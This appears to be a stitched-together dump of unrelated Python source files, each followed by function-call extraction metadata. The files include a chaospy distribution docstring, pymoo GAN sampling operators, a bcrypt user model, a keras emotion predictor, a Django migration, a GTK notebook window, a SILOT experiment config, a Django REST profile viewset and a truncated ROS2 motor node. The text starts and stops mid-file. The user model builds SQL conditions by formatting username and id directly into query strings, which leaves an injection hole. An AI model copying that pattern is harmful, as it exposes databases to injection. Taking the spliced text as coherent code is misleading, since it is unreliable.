array([1.2231, 1.5108, 1.9163, 2.6094])
>>> distribution.fwd(distribution.inv(q)).round(4)
array([0.2, 0.4, 0.6, 0.8])
>>> distribution.pdf(distribution.inv(q)).round(4)
array([0.8, 0.6, 0.4, 0.2])
>>> distribution.sample(4).round(4)
array([2.0601, 1.1222, 4.0014, 1.6581])
>>> distribution.mom(1)
array(2.)
>>> distribution.ttr([1, 2, 3]).round(4)
array([[4., 6., 8.],
[1., 4., 9.]])
"""
def __init__(self, shape=1, scale=1, shift=0):
self._repr = {"shape": shape, "scale": scale, "shift": shift}
Add.__init__(self, left=gamma(shape)*scale, right=shift)
class Exponential(Add):
R"""
Exponential Probability Distribution
Args:
scale (float, Dist):
Scale parameter. scale!=0
shift (float, Dist):
Location of the lower bound.
Examples;:
>>> distribution = chaospy.Exponential(2, 3)
>>> distribution
Exponential(scale=2, shift=3)
>>> q = numpy.linspace(0,1,6)[1:-1]
>>> distribution.inv(q).round(4)
array([3.4463, 4.0217, 4.8326, 6.2189])
>>> distribution.fwd(distribution.inv(q)).round(4)
array([0.2, 0.4, 0.6, 0.8])
>>> distribution.sample(4).round(4)
array([5.1203, 3.2444, 9.0028, 4.3163])
>>> distribution.mom(1).round(4)
5.0
>>> distribution.ttr([1, 2, 3]).round(4)
array([[ 9., 13., 17.],
[ 4., 16., 36.]])
"""
def __init__(self, scale=1, shift=0):
self._repr = {"scale": scale, "shift": shift}
Add.__init__(self, left=gamma(1)*scale, right=shift)
| [
"scipy.special.gamma",
"scipy.special.gammainc",
"scipy.special.gammaincinv"
] | [((342, 364), 'scipy.special.gammainc', 'special.gammainc', (['a', 'x'], {}), '(a, x)\n', (358, 364), False, 'from scipy import special\n'), ((407, 432), 'scipy.special.gammaincinv', 'special.gammaincinv', (['a', 'q'], {}), '(a, q)\n', (426, 432), False, 'from scipy import special\n'), ((283, 299), 'scipy.special.gamma', 'special.gamma', (['a'], {}), '(a)\n', (296, 299), False, 'from scipy import special\n'), ((475, 495), 'scipy.special.gamma', 'special.gamma', (['(a + k)'], {}), '(a + k)\n', (488, 495), False, 'from scipy import special\n'), ((494, 510), 'scipy.special.gamma', 'special.gamma', (['a'], {}), '(a)\n', (507, 510), False, 'from scipy import special\n')] |
import numpy as np
import torch
from scipy.stats import truncnorm
from pymoo.factory import get_sampling, get_crossover, get_mutation
from pymoo.operators.mixed_variable_operator import MixedVariableSampling, MixedVariableMutation, MixedVariableCrossover
from pymoo.model.sampling import Sampling
class TruncatedNormalRandomSampling(Sampling):
def __init__(self, var_type=np.float):
super().__init__()
self.var_type = var_type
def _do(self, problem, n_samples, **kwargs):
return truncnorm.rvs(-2, 2, size=(n_samples, problem.n_var)).astype(np.float32)
class NormalRandomSampling(Sampling):
def __init__(self, mu=0, std=1, var_type=np.float):
super().__init__()
self.mu = mu
self.std = std
self.var_type = var_type
def _do(self, problem, n_samples, **kwargs):
return np.random.normal(self.mu, self.std, size=(n_samples, problem.n_var))
class BinaryRandomSampling(Sampling):
def __init__(self, prob=0.5):
super().__init__()
self.prob = prob
def _do(self, problem, n_samples, **kwargs):
val = np.random.random((n_samples, problem.n_var))
return (val < self.prob).astype(np.bool)
def get_operators(config):
if config.config == "DeepMindBigGAN256" or config.config == "DeepMindBigGAN512":
mask = ["real"]*config.dim_z + ["bool"]*config.num_classes
real_sampling = None
if config.config == "DeepMindBigGAN256" or config.config == "DeepMindBigGAN512":
real_sampling = TruncatedNormalRandomSampling()
sampling = MixedVariableSampling(mask, {
"real": real_sampling,
"bool": BinaryRandomSampling(prob=5/1000)
})
crossover = MixedVariableCrossover(mask, {
"real": get_crossover("real_sbx", prob=1.0, eta=3.0),
"bool": get_crossover("bin_hux", prob=0.2)
})
mutation = MixedVariableMutation(mask, {
"real": get_mutation("real_pm", prob=0.5, eta=3.0),
"bool": get_mutation("bin_bitflip", prob=10/1000)
})
return dict(
sampling=sampling,
crossover=crossover,
mutation=mutation
)
elif config.config.split("_")[0] == "StyleGAN2":
return dict(
sampling=NormalRandomSampling(),
crossover=get_crossover("real_sbx", prob=1.0, eta=3.0),
mutation=get_mutation("real_pm", prob=0.5, eta=3.0)
)
elif config.config.split("_")[0] == "Adaily":
return dict(
sampling=NormalRandomSampling(),
crossover=get_crossover("real_sbx", prob=1.0, eta=3.0),
mutation=get_mutation("real_pm", prob=0.5, eta=3.0)
)
elif config.config == "GPT2":
return dict(
sampling=get_sampling("int_random"),
crossover=get_crossover("int_sbx", prob=1.0, eta=3.0),
mutation=get_mutation("int_pm", prob=0.5, eta=3.0)
)
else:
raise Exception("Unknown config")
| [
"numpy.random.normal",
"numpy.random.random",
"pymoo.factory.get_mutation",
"pymoo.factory.get_sampling",
"pymoo.factory.get_crossover",
"scipy.stats.truncnorm.rvs"
] | [((851, 919), 'numpy.random.normal', 'np.random.normal', (['self.mu', 'self.std'], {'size': '(n_samples, problem.n_var)'}), '(self.mu, self.std, size=(n_samples, problem.n_var))\n', (867, 919), True, 'import numpy as np\n'), ((1109, 1153), 'numpy.random.random', 'np.random.random', (['(n_samples, problem.n_var)'], {}), '((n_samples, problem.n_var))\n', (1125, 1153), True, 'import numpy as np\n'), ((514, 567), 'scipy.stats.truncnorm.rvs', 'truncnorm.rvs', (['(-2)', '(2)'], {'size': '(n_samples, problem.n_var)'}), '(-2, 2, size=(n_samples, problem.n_var))\n', (527, 567), False, 'from scipy.stats import truncnorm\n'), ((1785, 1829), 'pymoo.factory.get_crossover', 'get_crossover', (['"""real_sbx"""'], {'prob': '(1.0)', 'eta': '(3.0)'}), "('real_sbx', prob=1.0, eta=3.0)\n", (1798, 1829), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((1851, 1885), 'pymoo.factory.get_crossover', 'get_crossover', (['"""bin_hux"""'], {'prob': '(0.2)'}), "('bin_hux', prob=0.2)\n", (1864, 1885), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((1967, 2009), 'pymoo.factory.get_mutation', 'get_mutation', (['"""real_pm"""'], {'prob': '(0.5)', 'eta': '(3.0)'}), "('real_pm', prob=0.5, eta=3.0)\n", (1979, 2009), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2031, 2074), 'pymoo.factory.get_mutation', 'get_mutation', (['"""bin_bitflip"""'], {'prob': '(10 / 1000)'}), "('bin_bitflip', prob=10 / 1000)\n", (2043, 2074), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2352, 2396), 'pymoo.factory.get_crossover', 'get_crossover', (['"""real_sbx"""'], {'prob': '(1.0)', 'eta': '(3.0)'}), "('real_sbx', prob=1.0, eta=3.0)\n", (2365, 2396), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2419, 2461), 'pymoo.factory.get_mutation', 'get_mutation', (['"""real_pm"""'], {'prob': '(0.5)', 'eta': '(3.0)'}), "('real_pm', prob=0.5, eta=3.0)\n", 
(2431, 2461), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2611, 2655), 'pymoo.factory.get_crossover', 'get_crossover', (['"""real_sbx"""'], {'prob': '(1.0)', 'eta': '(3.0)'}), "('real_sbx', prob=1.0, eta=3.0)\n", (2624, 2655), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2678, 2720), 'pymoo.factory.get_mutation', 'get_mutation', (['"""real_pm"""'], {'prob': '(0.5)', 'eta': '(3.0)'}), "('real_pm', prob=0.5, eta=3.0)\n", (2690, 2720), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2808, 2834), 'pymoo.factory.get_sampling', 'get_sampling', (['"""int_random"""'], {}), "('int_random')\n", (2820, 2834), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2858, 2901), 'pymoo.factory.get_crossover', 'get_crossover', (['"""int_sbx"""'], {'prob': '(1.0)', 'eta': '(3.0)'}), "('int_sbx', prob=1.0, eta=3.0)\n", (2871, 2901), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n'), ((2924, 2965), 'pymoo.factory.get_mutation', 'get_mutation', (['"""int_pm"""'], {'prob': '(0.5)', 'eta': '(3.0)'}), "('int_pm', prob=0.5, eta=3.0)\n", (2936, 2965), False, 'from pymoo.factory import get_sampling, get_crossover, get_mutation\n')] |
class UserModel(Table):
def __init__(self):
self.tableName = "User"
self.requiredFields = ['firstName', 'lastName', 'username', 'password']
self.optionalFields = ['email']
def check(self, data):
for req in self.requiredFields:
if req not in data:
return False
for opt in self.optionalFields:
if opt not in data:
data[opt] = ""
return data
def getById(self, id):
rows = self.select([
"id LIKE {}".format(id)
])
if rows:
return rows[0]
else:
None
def getByUsername(self, username):
rows = self.select([
"username LIKE '{}'".format(username)
])
if rows:
return rows[0]
else:
None
def add(self, data):
import bcrypt
data = self.check(data)
if not data:
return False
data['password'] = bcrypt.hashpw(data['password'].encode("utf-8"), bcrypt.gensalt()).decode("utf-8")
self.insert(data)
| [
"bcrypt.gensalt"
] | [((816, 832), 'bcrypt.gensalt', 'bcrypt.gensalt', ([], {}), '()\n', (830, 832), False, 'import bcrypt\n')] |
import config as cfg
import cv2
import numpy as np
from keras.models import load_model
from keras.preprocessing.image import img_to_array
from keras import backend as K
import tensorflow as tf
import keras
'''
esto es necesario para que no haya errores a la hora de exponer el servicio con flask
info --> https://github.com/tensorflow/tensorflow/issues/28287#issuecomment-495005162
'''
from keras.backend import set_session
sess = tf.Session()
graph = tf.get_default_graph()
set_session(sess)
model_emotions = load_model(cfg.path_model)
class predict_emotions():
'''
def __init__(self):
# cargo modelo de deteccion de emociones
global graph
self.graph = tf.get_default_graph()
self.model_emotions = load_model(cfg.path_model)
'''
def preprocess_img(self,face_image,rgb=True,w=48,h=48):
face_image = cv2.resize(face_image, (w,h))
if rgb == False:
face_image = cv2.cvtColor(face_image, cv2.COLOR_BGR2GRAY)
face_image = face_image.astype("float") / 255.0
face_image= img_to_array(face_image)
face_image = np.expand_dims(face_image, axis=0)
return face_image
def get_emotion(self,img,boxes_face):
emotions = []
if len(boxes_face)!=0:
for box in boxes_face:
y0,x0,y1,x1 = box
face_image = img[x0:x1,y0:y1]
# preprocesar data
face_image = self.preprocess_img(face_image ,cfg.rgb, cfg.w, cfg.h)
# predecir imagen
global sess
global graph
with graph.as_default():
set_session(sess)
prediction = model_emotions.predict(face_image)
emotion = cfg.labels[prediction.argmax()]
emotions.append(emotion)
else:
emotions = []
boxes_face = []
return boxes_face,emotions
| [
"keras.preprocessing.image.img_to_array",
"keras.models.load_model",
"tensorflow.Session",
"keras.backend.set_session",
"numpy.expand_dims",
"cv2.cvtColor",
"cv2.resize",
"tensorflow.get_default_graph"
] | [((432, 444), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (442, 444), True, 'import tensorflow as tf\n'), ((453, 475), 'tensorflow.get_default_graph', 'tf.get_default_graph', ([], {}), '()\n', (473, 475), True, 'import tensorflow as tf\n'), ((477, 494), 'keras.backend.set_session', 'set_session', (['sess'], {}), '(sess)\n', (488, 494), False, 'from keras.backend import set_session\n'), ((512, 538), 'keras.models.load_model', 'load_model', (['cfg.path_model'], {}), '(cfg.path_model)\n', (522, 538), False, 'from keras.models import load_model\n'), ((860, 890), 'cv2.resize', 'cv2.resize', (['face_image', '(w, h)'], {}), '(face_image, (w, h))\n', (870, 890), False, 'import cv2\n'), ((1061, 1085), 'keras.preprocessing.image.img_to_array', 'img_to_array', (['face_image'], {}), '(face_image)\n', (1073, 1085), False, 'from keras.preprocessing.image import img_to_array\n'), ((1107, 1141), 'numpy.expand_dims', 'np.expand_dims', (['face_image'], {'axis': '(0)'}), '(face_image, axis=0)\n', (1121, 1141), True, 'import numpy as np\n'), ((940, 984), 'cv2.cvtColor', 'cv2.cvtColor', (['face_image', 'cv2.COLOR_BGR2GRAY'], {}), '(face_image, cv2.COLOR_BGR2GRAY)\n', (952, 984), False, 'import cv2\n'), ((1650, 1667), 'keras.backend.set_session', 'set_session', (['sess'], {}), '(sess)\n', (1661, 1667), False, 'from keras.backend import set_session\n')] |
# Generated by Django 2.2.1 on 2020-03-10 18:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('gui', '0013_auto_20200310_1742'),
]
operations = [
migrations.AddField(
model_name='feedback',
name='childprotection',
field=models.TextField(blank=True, max_length=1000, verbose_name='Kinderschutzrelevante Information'),
),
]
| [
"django.db.models.TextField"
] | [((341, 441), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(1000)', 'verbose_name': '"""Kinderschutzrelevante Information"""'}), "(blank=True, max_length=1000, verbose_name=\n 'Kinderschutzrelevante Information')\n", (357, 441), False, 'from django.db import migrations, models\n')] |
# Copyright 2008-2009 <NAME>
#
# This file is part of Reinteract and distributed under the terms
# of the BSD license. See the file COPYING in the Reinteract
# distribution for full details.
#
########################################################################
import gtk
import os
from base_notebook_window import BaseNotebookWindow
from file_list import FileList
from format_escaped import format_escaped
from notebook import NotebookFile, WorksheetFile, LibraryFile
from save_file import SaveFileBuilder
gtk.rc_parse_string(
"""
style "notebook-close-button" {
GtkWidget::focus-line-width = 0
GtkWidget::focus-padding = 0
GtkButton::inner-border = { 0, 0, 0, 0 }
}
widget "*.notebook-close-button" style : highest "notebook-close-button"
""")
class NotebookWindow(BaseNotebookWindow):
UI_STRING="""
<ui>
<menubar name="TopMenu">
<menu action="file">
<menuitem action="new-notebook"/>
<menuitem action="open-notebook"/>
<menuitem action="notebook-properties"/>
<separator/>
<menuitem action="new-worksheet"/>
<menuitem action="new-library"/>
<menuitem action="open"/>
<menuitem action="save"/>
<menuitem action="rename"/>
<menuitem action="close"/>
<separator/>
<menuitem action="quit"/>
</menu>
<menu action="edit">
<menuitem action="cut"/>
<menuitem action="copy"/>
<menuitem action="copy-as-doctests"/>
<menuitem action="paste"/>
<menuitem action="delete"/>
<separator/>
<menuitem action="calculate"/>
<menuitem action="calculate-to-line"/>
<menuitem action="break"/>
<separator/>
<menuitem action="calculate-all"/>
<separator/>
<menuitem action="preferences"/>
</menu>
<menu action="help">
<menuitem action="about"/>
</menu>
</menubar>
<toolbar name="ToolBar">
<toolitem action="save"/>
<separator/>
<toolitem action="calculate"/>
<toolitem action="break"/>
</toolbar>
</ui>
"""
def __init__(self, notebook):
BaseNotebookWindow.__init__(self, notebook)
self.window.set_default_size(800, 800)
#######################################################
# Overrides
#######################################################
def _fill_content(self):
hpaned = gtk.HPaned()
position = self.state.get_pane_position()
if position == -1:
hpaned.set_position(200)
else:
hpaned.set_position(position)
hpaned.connect('notify::position', self.on_hpaned_notify_position)
self.main_vbox.pack_start(hpaned, expand=True, fill=True)
scrolled_window = gtk.ScrolledWindow()
scrolled_window.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
hpaned.pack1(scrolled_window, resize=False)
self.__file_list = FileList(self.notebook)
scrolled_window.add(self.__file_list)
self.__file_list.connect('open-file', self.on_file_list_open_file)
self.__file_list.connect('close-file', self.on_file_list_close_file)
self.__file_list.connect('rename-file', self.on_file_list_rename_file)
self.__file_list.connect('delete-file', self.on_file_list_delete_file)
hpaned.pack2(self.nb_widget, resize=True)
self.nb_widget.set_scrollable(True)
def _add_editor(self, editor):
# Set first since _add_editor() calls _update_editor_title()
editor._notebook_tab_label = gtk.Label()
editor._notebook_tab_status = gtk.Image()
editor._notebook_tab_status.props.icon_size = gtk.ICON_SIZE_MENU
BaseNotebookWindow._add_editor(self, editor)
label_widget = gtk.HBox(False, 4)
label_widget.pack_start(editor._notebook_tab_status, True, True, 0)
label_widget.pack_start(editor._notebook_tab_label, True, True, 0)
tab_button = gtk.Button()
tab_button.set_name('notebook-close-button')
tab_button.set_relief(gtk.RELIEF_NONE)
tab_button.props.can_focus = False
tab_button.connect('clicked', lambda *args: self.on_tab_close_button_clicked(editor))
label_widget.pack_start(tab_button, False, False, 0)
close = gtk.image_new_from_stock('gtk-close', gtk.ICON_SIZE_MENU)
tab_button.add(close)
label_widget.show_all()
self.nb_widget.set_tab_label(editor.widget, label_widget)
self.nb_widget.set_tab_reorderable(editor.widget, True)
def _update_editor_title(self, editor):
BaseNotebookWindow._update_editor_title(self, editor)
editor._notebook_tab_label.set_text(editor.title)
def _update_editor_state(self, editor):
BaseNotebookWindow._update_editor_state(self, editor)
editor._notebook_tab_status.props.stock = NotebookFile.stock_id_for_state(editor.state)
#######################################################
# Callbacks
#######################################################
def on_tab_close_button_clicked(self, editor):
self._close_editor(editor)
def on_file_list_open_file(self, file_list, file):
self.open_file(file)
def on_file_list_close_file(self, file_list, file):
for editor in self.editors:
if editor.file == file:
self._close_editor(editor)
def on_file_list_rename_file(self, file_list, file):
if file.active:
# If we have the file open, we need to rename via the editor
for editor in self.editors:
if editor.file == file:
editor.rename()
# Reselect the new item in the list
new_file = self.notebook.file_for_absolute_path(editor.filename)
file_list.select_file(new_file)
else:
# Otherwise do it directly
def check_name(name):
return name != "" and name != file.path
def do_rename(new_path):
old_path = os.path.join(self.notebook.folder, file.path)
os.rename(old_path, new_path)
self.notebook.refresh()
# Reselect the new item in the list
new_file = self.notebook.file_for_absolute_path(new_path)
file_list.select_file(new_file)
title = "Rename '%s'" % file.path
builder = SaveFileBuilder(title, file.path, "Rename", check_name)
builder.dialog.set_transient_for(self.window)
builder.name_entry.set_text(file.path)
if isinstance(file, WorksheetFile):
extension = "rws"
elif isinstance(file, LibraryFile):
extension = "py"
else:
extension = ""
builder.prompt_for_name(self.notebook.folder, extension, do_rename)
builder.dialog.destroy()
def on_file_list_delete_file(self, file_list, file):
dialog = gtk.MessageDialog(parent=self.window, buttons=gtk.BUTTONS_NONE,
type=gtk.MESSAGE_WARNING)
message = format_escaped("<big><b>Really delete '%s'?</b></big>", file.path)
dialog.set_markup(message)
dialog.add_buttons(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_DELETE, gtk.RESPONSE_OK)
dialog.set_default_response(gtk.RESPONSE_CANCEL)
response = dialog.run()
dialog.destroy()
if response != gtk.RESPONSE_OK:
return
for editor in self.editors:
if editor.file == file:
self._close_editor(editor)
abspath = os.path.join(self.notebook.folder, file.path)
os.remove(abspath)
self.notebook.refresh()
def on_hpaned_notify_position(self, pane, gparamspec):
self.state.set_pane_position(pane.get_property('position'))
| [
"gtk.ScrolledWindow",
"file_list.FileList",
"gtk.rc_parse_string",
"base_notebook_window.BaseNotebookWindow._add_editor",
"gtk.HBox",
"gtk.MessageDialog",
"base_notebook_window.BaseNotebookWindow.__init__",
"os.remove",
"base_notebook_window.BaseNotebookWindow._update_editor_state",
"base_notebook... | [((515, 800), 'gtk.rc_parse_string', 'gtk.rc_parse_string', (['"""\n style "notebook-close-button" {\n GtkWidget::focus-line-width = 0\n GtkWidget::focus-padding = 0\n GtkButton::inner-border = { 0, 0, 0, 0 }\n }\n widget "*.notebook-close-button" style : highest "notebook-close-button"\n """'], {}), '(\n """\n style "notebook-close-button" {\n GtkWidget::focus-line-width = 0\n GtkWidget::focus-padding = 0\n GtkButton::inner-border = { 0, 0, 0, 0 }\n }\n widget "*.notebook-close-button" style : highest "notebook-close-button"\n """\n )\n', (534, 800), False, 'import gtk\n'), ((2182, 2225), 'base_notebook_window.BaseNotebookWindow.__init__', 'BaseNotebookWindow.__init__', (['self', 'notebook'], {}), '(self, notebook)\n', (2209, 2225), False, 'from base_notebook_window import BaseNotebookWindow\n'), ((2458, 2470), 'gtk.HPaned', 'gtk.HPaned', ([], {}), '()\n', (2468, 2470), False, 'import gtk\n'), ((2809, 2829), 'gtk.ScrolledWindow', 'gtk.ScrolledWindow', ([], {}), '()\n', (2827, 2829), False, 'import gtk\n'), ((2989, 3012), 'file_list.FileList', 'FileList', (['self.notebook'], {}), '(self.notebook)\n', (2997, 3012), False, 'from file_list import FileList\n'), ((3607, 3618), 'gtk.Label', 'gtk.Label', ([], {}), '()\n', (3616, 3618), False, 'import gtk\n'), ((3657, 3668), 'gtk.Image', 'gtk.Image', ([], {}), '()\n', (3666, 3668), False, 'import gtk\n'), ((3750, 3794), 'base_notebook_window.BaseNotebookWindow._add_editor', 'BaseNotebookWindow._add_editor', (['self', 'editor'], {}), '(self, editor)\n', (3780, 3794), False, 'from base_notebook_window import BaseNotebookWindow\n'), ((3819, 3837), 'gtk.HBox', 'gtk.HBox', (['(False)', '(4)'], {}), '(False, 4)\n', (3827, 3837), False, 'import gtk\n'), ((4010, 4022), 'gtk.Button', 'gtk.Button', ([], {}), '()\n', (4020, 4022), False, 'import gtk\n'), ((4337, 4394), 'gtk.image_new_from_stock', 'gtk.image_new_from_stock', (['"""gtk-close"""', 'gtk.ICON_SIZE_MENU'], {}), "('gtk-close', gtk.ICON_SIZE_MENU)\n", 
(4361, 4394), False, 'import gtk\n'), ((4642, 4695), 'base_notebook_window.BaseNotebookWindow._update_editor_title', 'BaseNotebookWindow._update_editor_title', (['self', 'editor'], {}), '(self, editor)\n', (4681, 4695), False, 'from base_notebook_window import BaseNotebookWindow\n'), ((4807, 4860), 'base_notebook_window.BaseNotebookWindow._update_editor_state', 'BaseNotebookWindow._update_editor_state', (['self', 'editor'], {}), '(self, editor)\n', (4846, 4860), False, 'from base_notebook_window import BaseNotebookWindow\n'), ((4911, 4956), 'notebook.NotebookFile.stock_id_for_state', 'NotebookFile.stock_id_for_state', (['editor.state'], {}), '(editor.state)\n', (4942, 4956), False, 'from notebook import NotebookFile, WorksheetFile, LibraryFile\n'), ((7045, 7139), 'gtk.MessageDialog', 'gtk.MessageDialog', ([], {'parent': 'self.window', 'buttons': 'gtk.BUTTONS_NONE', 'type': 'gtk.MESSAGE_WARNING'}), '(parent=self.window, buttons=gtk.BUTTONS_NONE, type=gtk.\n MESSAGE_WARNING)\n', (7062, 7139), False, 'import gtk\n'), ((7188, 7254), 'format_escaped.format_escaped', 'format_escaped', (['"""<big><b>Really delete \'%s\'?</b></big>"""', 'file.path'], {}), '("<big><b>Really delete \'%s\'?</b></big>", file.path)\n', (7202, 7254), False, 'from format_escaped import format_escaped\n'), ((7728, 7773), 'os.path.join', 'os.path.join', (['self.notebook.folder', 'file.path'], {}), '(self.notebook.folder, file.path)\n', (7740, 7773), False, 'import os\n'), ((7782, 7800), 'os.remove', 'os.remove', (['abspath'], {}), '(abspath)\n', (7791, 7800), False, 'import os\n'), ((6474, 6529), 'save_file.SaveFileBuilder', 'SaveFileBuilder', (['title', 'file.path', '"""Rename"""', 'check_name'], {}), "(title, file.path, 'Rename', check_name)\n", (6489, 6529), False, 'from save_file import SaveFileBuilder\n'), ((6098, 6143), 'os.path.join', 'os.path.join', (['self.notebook.folder', 'file.path'], {}), '(self.notebook.folder, file.path)\n', (6110, 6143), False, 'import os\n'), ((6160, 6189), 
'os.rename', 'os.rename', (['old_path', 'new_path'], {}), '(old_path, new_path)\n', (6169, 6189), False, 'import os\n')] |
from dps.hyper import run_experiment
from dps.utils import copy_update
from dps.tf.updater import DummyUpdater
from silot.run import basic_config, alg_configs, env_configs
import argparse

# Single CLI knob: how many digits the moving-MNIST variant may contain.
parser = argparse.ArgumentParser()
parser.add_argument('--max-digits', type=int, choices=[6, 12], required=True)
args, _ = parser.parse_known_args()

readme = "Running SILOT experiment on moving_mnist."

# Cluster resources for the full-length run.
run_kwargs = {
    'max_hosts': 1, 'ppn': 6, 'cpp': 2, 'gpu_set': "0,1", 'pmem': 10000,
    'project': "rpp-bengioy", 'wall_time': "96hours", 'cleanup_time': "5mins",
    'slack_time': "5mins", 'n_repeats': 6, 'copy_locally': True,
    'config': {'render_step': 1000000},
}

# Three run profiles: the real run, a quick smoke test, and a dataset-build pass.
durations = {
    'long': copy_update(run_kwargs),
    'short': {
        'wall_time': "180mins", 'gpu_set': "0", 'ppn': 4, 'n_repeats': 4,
        'distributions': None,
        'config': {
            'max_steps': 3000, 'render_step': 500, 'eval_step': 100,
            'display_step': 100, 'stage_steps': 600, 'curriculum': [{}],
        },
    },
    'build': {
        'ppn': 1, 'cpp': 1, 'gpu_set': "0", 'wall_time': "180mins",
        'n_repeats': 1, 'distributions': None,
        'config': {
            'do_train': False, 'get_updater': DummyUpdater, 'render_hook': None,
            # One warm-up stage followed by one dataset-build stage per digit count.
            'curriculum': [{}] + [
                {'max_digits': i, 'n_train': 100, 'n_val': 1000}
                for i in range(1, 13)
            ],
        },
    },
}

# Assemble the final config: base -> environment -> algorithm -> overrides.
config = basic_config.copy()
config.update(env_configs['moving_mnist'])
config.update(alg_configs['silot'], max_digits=args.max_digits)
config.update(final_count_prior_log_odds=0.0125, stage_steps=40000)

run_experiment(
    "moving_mnist_silot",
    config, "silot on moving_mnist.",
    name_variables="max_digits",
    durations=durations
)
| [
"silot.run.basic_config.copy",
"dps.hyper.run_experiment",
"dps.utils.copy_update",
"argparse.ArgumentParser"
] | [((198, 223), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (221, 223), False, 'import argparse\n'), ((1244, 1263), 'silot.run.basic_config.copy', 'basic_config.copy', ([], {}), '()\n', (1261, 1263), False, 'from silot.run import basic_config, alg_configs, env_configs\n'), ((1440, 1564), 'dps.hyper.run_experiment', 'run_experiment', (['"""moving_mnist_silot"""', 'config', '"""silot on moving_mnist."""'], {'name_variables': '"""max_digits"""', 'durations': 'durations'}), "('moving_mnist_silot', config, 'silot on moving_mnist.',\n name_variables='max_digits', durations=durations)\n", (1454, 1564), False, 'from dps.hyper import run_experiment\n'), ((660, 683), 'dps.utils.copy_update', 'copy_update', (['run_kwargs'], {}), '(run_kwargs)\n', (671, 683), False, 'from dps.utils import copy_update\n')] |
from django.contrib.auth import get_user_model
from rest_framework import viewsets, status, permissions
from rest_framework.response import Response
from profiles.models import Profile
from profiles.permissions import IsUserProfileOrAdmin
from profiles import serializers
User = get_user_model()
class ProfileViewSet(viewsets.ModelViewSet):
    """CRUD endpoints for Profile objects, looked up by UUID."""

    queryset = Profile.objects.all()
    lookup_field = 'uuid'
    permission_classes = []

    def create(self, request, *args, **kwargs):
        """Validate and save a new profile, then echo it through the read serializer."""
        write_serializer = self.get_serializer(data=request.data)
        write_serializer.is_valid(raise_exception=True)
        created = self.perform_create(write_serializer)
        response_headers = self.get_success_headers(write_serializer.data)
        read_serializer = serializers.ProfileSerializer(created)
        return Response(
            read_serializer.data,
            status=status.HTTP_201_CREATED,
            headers=response_headers,
        )

    def perform_create(self, serializer):
        # Return the saved instance so ``create`` can re-serialize it.
        return serializer.save()

    def update(self, request, *args, **kwargs):
        """Reject updates that omit the 'user' or 'social_link' attribute."""
        for required in ('user', 'social_link'):
            if not request.data.get(required):
                return Response(
                    dict(error="Attribute '%s' is missing." % required),
                    status=status.HTTP_400_BAD_REQUEST,
                )
        return super().update(request, *args, **kwargs)

    def destroy(self, request, *args, **kwargs):
        """Delete the profile together with its related user and social link."""
        profile = self.get_object()
        owner = profile.user
        link = profile.social_link
        link.delete()
        self.perform_destroy(profile)
        owner.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)

    def get_serializer_class(self):
        """Pick the serializer that matches the current action."""
        per_action = {
            'create': serializers.ProfileCreateSerializer,
            'update': serializers.ProfileUpdateSerializer,
            'partial_update': serializers.ProfileUpdateSerializer,
        }
        return per_action.get(self.action, serializers.ProfileSerializer)

    def get_permissions(self):
        """Tighten permissions for listing and for mutating actions."""
        if self.action == 'list':
            self.permission_classes = (
                permissions.IsAuthenticated,
                permissions.IsAdminUser,
            )
        elif self.action in ('update', 'partial_update', 'destroy'):
            self.permission_classes = (
                permissions.IsAuthenticated,
                IsUserProfileOrAdmin,
            )
        return super().get_permissions()
| [
"profiles.serializers.ProfileSerializer",
"django.contrib.auth.get_user_model",
"rest_framework.response.Response",
"profiles.models.Profile.objects.all"
] | [((282, 298), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (296, 298), False, 'from django.contrib.auth import get_user_model\n'), ((361, 382), 'profiles.models.Profile.objects.all', 'Profile.objects.all', ([], {}), '()\n', (380, 382), False, 'from profiles.models import Profile\n'), ((739, 778), 'profiles.serializers.ProfileSerializer', 'serializers.ProfileSerializer', (['instance'], {}), '(instance)\n', (768, 778), False, 'from profiles import serializers\n'), ((794, 882), 'rest_framework.response.Response', 'Response', (['instance_serializer.data'], {'status': 'status.HTTP_201_CREATED', 'headers': 'headers'}), '(instance_serializer.data, status=status.HTTP_201_CREATED, headers=\n headers)\n', (802, 882), False, 'from rest_framework.response import Response\n'), ((1644, 1687), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_204_NO_CONTENT'}), '(status=status.HTTP_204_NO_CONTENT)\n', (1652, 1687), False, 'from rest_framework.response import Response\n')] |
import rclpy
import json,numpy
from numpy import clip
from rclpy.node import Node
from std_msgs.msg import Float64MultiArray
from sensor_msgs.msg import JointState
from diagnostic_msgs.msg import DiagnosticStatus, KeyValue
import can
from tinymovr import Tinymovr
from tinymovr.iface.can import CAN
from tinymovr.units import get_registry
from math import pi
# Unit registry from tinymovr; the aliases below attach physical units to
# set-points and telemetry values throughout this node.
ureg = get_registry()
amps = ureg.ampere
s = ureg.second
minute = ureg.minute
tick = ureg.tick
rad = ureg.radian
turn = ureg.turn
deg = ureg.degree
class HardwareAbstractionLayer(Node):
    """ROS2 node bridging joint-level commands/states to Tinymovr motor
    controllers over a CAN (slcan) bus.

    Subscribes to '/vanille/joint_position_cmd' and publishes joint states on
    '/vanille/joint_states' plus per-motor diagnostics.
    """

    def __init__(self):
        super().__init__('HardwareAbstractionLayer')
        # Read the motor configuration file
        f = open("/home/vanille/ros2_ws/src/hal/config.json","r")
        self.config = json.load(f)
        f.close()
        # Open the serial-line CAN adapter and wrap it in the Tinymovr interface.
